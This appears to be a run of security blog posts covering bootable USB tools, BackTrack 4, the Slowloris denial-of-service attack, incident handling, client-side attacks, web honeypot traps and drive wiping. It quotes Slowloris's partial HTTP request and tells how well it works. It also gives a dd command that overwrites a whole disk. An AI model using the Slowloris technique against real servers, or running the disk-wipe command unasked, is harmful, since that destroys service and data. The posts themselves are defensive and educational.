Live boot CDs have always been the mainstay of security and incident response toolkits. These days CD drives are starting to become scarcer, optical media is prone to scratching, and flash media is rapidly getting cheaper. Additionally flash drives often have much high capacity storage for their size.
As a result USB pendrives are starting to overtake CD/DVD in terms of popularity. One fallback was often the difficulty encountered in getting the drive to both store the required live filesystem and boot from power on. For example, my first successful bootable drive (running BackTrack3) was the result of several days trial and error.
However, things now much simpler thanks to the Unetbootin utility. Simply select a distribution a support distribution from drop-down list which will automate the download of required media and select an attached USB drive and start the process. The tool then goes off in the background and creates a bootable USB drive, no fuss.
Alternatively you can point the utility at a local *.iso file, whilst not all distributions are officially supported by Unetbootin, I’m yet to have it fail on me.
P.S. the Backtrack4 Up and Running video series shows the Unetbootin process in all it’s simplicity.
The Remote-Exploit boys have done it again, pre-release version of BackTrack 4 is available for download here. As always there is a large amount documentation available on the Remote-Exploit wiki and forum, and the Offensive-Security blog.
In case you’ve been living under a rock, BackTrack is now based on Ubuntu which makes the OS easier to install thanks, in part, to the Ubuquity installer, a video demo of the process is included in a series of intro videos designed to get you up and running
So far I’ve had the latest version run on all my usual hardware, only issue I still need resolve (or to find someone elses’ solution) is the resolution on my AA1, so far the driver and cheat codes used to fix the issue with BT3 don’t have the same effect.
As expected BT4 has the usual assortment of best of breed tools, but it seems to have trimmed some of the fat that was found in previous releases. Whilst some may miss specific tools, I think this helps keep some focus; rather having multiple tools perform the same the task with varying degrees of proficiency, the high-end tools are included to get the job done. I’m sure if anyone’s favourite tools are missing it will be easy enough to add as required.
Customisation appears to have been a focus of the new release as the process has been made easier and more automated than in previous releases, this article describes the new changes with an accomanying video demo.
Not much else to add, BackTrack is still great and moving forward to aid system 0wnage everywhere. Big thanks to Muts and the rest of the Remote Exploit Team.
The attack vector essentially works by initialising an HTTP request but never completes the request, causing the handling thread to wait for the end of the request. Slowloris uses multiple threads to rapidly exhaust the web servers available network resources. The attack is effective against several web server platforms, but most significant in terms of market share and install base is Apache 1.X and 2.X services.
The HTTP request currently generated by Slowloris is below, however before trying to use the info to create IDS signatures the packet contents could easily be modified to avoid overly specific signatures (and overally general signatures could generate high volume of false-positives)
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)
Highlighting the potential damage this technique could course, the Internet Storm Center has already posted two diaries discussing the attack since it’s release, the first introduces the tool and has some rudimentary low-level analysis of the attack vector. The second discusses potential mitigation techniques, unfortunately these are currently far from bulletproof at present.
Since it’s release I’ve tested the Slowloris script and, unfortunately, it’s been wholly effective everytime. Whilst the suggested mitigations can improve a web server’s resilience to the attack, as the point of the web-server is to provide services to the outside world it is near impossible to prevent a maliciuos attack of this nature without similarly impacting legitimate service provision. Unfortunately the maliciuos user has the up-hand in this battle, as the level of resources required to deny service is miniscule compared to the potential damage and resources required to avoid the threat.
Even against a server modified with some of the proposed mitigations, the attacker still only required a sustained traffic flow of appoximately 45Kbps, easily obtainable from even a single ADSL connection. This also means that the attack may be missed by some traditional techniques such as monitoring for unusual traffic levels. Especially as other servers on the server will be responsive, basically if you have issues with your web services I’d recommend checking current connections to the Apache service, for example:
#netstat -antp | grep :80
Best response I’ve found so far is re-active, basically get hit with the attack, find source IP and block at firewall (perimeter or host based), not ideal but, at least currently I haven’t seen this attack in the wild to justify modifying functional production servers to only mitigate against a potential attack when those modifications could deny legitimate services itself.
Life could be about to get interesting…
P.S. Twitter plug: whilst this attack vector could be significant, it was publically available 48hours before I noticed any reference in even information security focused mainstream media. However, I had a test environment demoing the script within 60 minutes of RSnake (@rsnake) publicising the link on Twitter.
The first is more a question of how to handle security incidents and requirements with minimal resources. This seems to be a common theme, with lots of in-house security teams complaining that resources are too tight and that priority (rightly or wrongly) is given to other business units. The summary of tips provided is too generic for my liking as most should be obvious or common-sense issues, although I’d definitely like some advice on how to actually achieve some of them. For example:
- Set priorities, don’t waste resources on unimportant or nonconsequential tasks.
- Get buy in from other business units (especially management)
- Stay calm
- Request assistance if workload is too much
The second article provides more concrete advice on planning for, and managing security incidents and boils down to three goal markers within an incident handling framework:
- If you don’t have written procedures or steps for handling an incident, then write some.
- Centralised, digital procedures are more useful than paper records. Allowing for easy access and colloboration by multiple members, with a specific recommendation of using a wiki.
- Automate as much of your procedures as possible. For example if one of the procedures is to search web server logs for specific entries, add a button or page to the wiki that automatically searches the specific logs and returns the information. Less steps for responders remember/work through, and less chance of making a mistake when under pressure
Finally the diary entry makes two points to make the case for why you want these systems in place.
- Compliance; logs from wiki based procedures can prove to auditors that the specified and pre-approved actions were taken during incident X.
- Management; logs and records from past incidents can prove the value of security and incident handling teams within an organisation, or prove SLA compliance with internal and/or external clients.
Psst. You are checking the ISC diary daily aren’t you?
I’ve been meaning to post a quick review of this for a while, but better late than never…
Recorded at Notacon ’09 CG and g0ne gave a great presentation on client side attacks, video here. The talk starts of with explaining what client side exploits are, and more importantly why we should care. And finished off with some quick and dirty client side attack examples using Metasploit.
I’ve found this talk really useful and have listened through it on several occassions to get a better feel for the client side aspect of penetration testing. Client side is an area that has been targetted quite extensively by the ‘bad guys’ and is just starting to get wide ranging attention from the security industry as a whole.
Throughout the slides, and at the end of the presentation, there are several links to additional reading and sources used for the presentation. Like the presentation itself I’ve found these to be very informative and provide useful info and techniques with genuine real-world application. Highlights of these links come from Lenny Zeltser and two post from Carnal 0wnage.
I definitely agree with all those that believe that client side is the next (or current) source of pain for the security industry and that traditional security architecture and tools aren’t currently up to the job of protecting against the threat.
As though client-side attacks weren’t easy enough thanks to the power of Metasploit as demonstrated, I recieved a link to a blog post priming the world for the release of Assagai, a new phishing framework. If it can live up to the billing, then I can’t wait to get my hands on the framework at release.
Johannes Ullrich recently posted an article detailing quick and simple traps you can add to a web site or web app to flag up suspicious and malicious activity on the site. Johannes does a better job of explain than I could so I’d recommend a read of his post, but put simply the traps discussed are:
- Don’t hand session credentials to automated clients
- Add fake admin pages to robots.txt
- Add fake cookies
- Add ‘Spider loops’
- Add fake hidden passwords as HTML comments
- Use ‘hidden’ form fields
All of the ideas are relatively simple to implement to a greater or lesser extent. I’ve spend the last week experimenting with some of the proposals and have seen some success so far. If I gain any unusual or interesting results I share my findings in a future post.
P.S. if your not already following the AppSec Street Fighter blog I’d highly recommend it.
Cleaning the harddrive of any machine, be it desktop, laptop or server, before either repurposing or selling (or even scrapping), should be a basic requirement of any organisation. But there is a seemingly unrelenting stream of reported incident, some of which coming from organisations that really should know better, MI6 and military contractors for example.
Is securely wiping data from drives really that difficult? Not really.
Simply boot the system with nearly any live linux system (I use Knoppix for this kind of work), then simply use dd (discussed previously to image drives) to overwrite the drive with random data. For example:
dd if=/dev/urandom of=/dev/sda
This simple overwrites the entire physical drive, sda, with random data taken from the pseudo device /dev/urandom. For more indepth info on wiping with dd and some different options see this guide.
The downside to wiping drives in this method is the length of time involved, in recent cases I have seen a 80GB drive take a little of five hours to complete.
Disclaimer: this may not make your data completely irratrievable but it should be enough to prevent the data being obtained by the simply curious. To truely ensure irratrievable data, try this method.
Disclaimer’s Disclaimer: Server destruction should only be carried out be trained professionals, InfoSanity accepts no responsibility for loss of live, limb or eyebrow)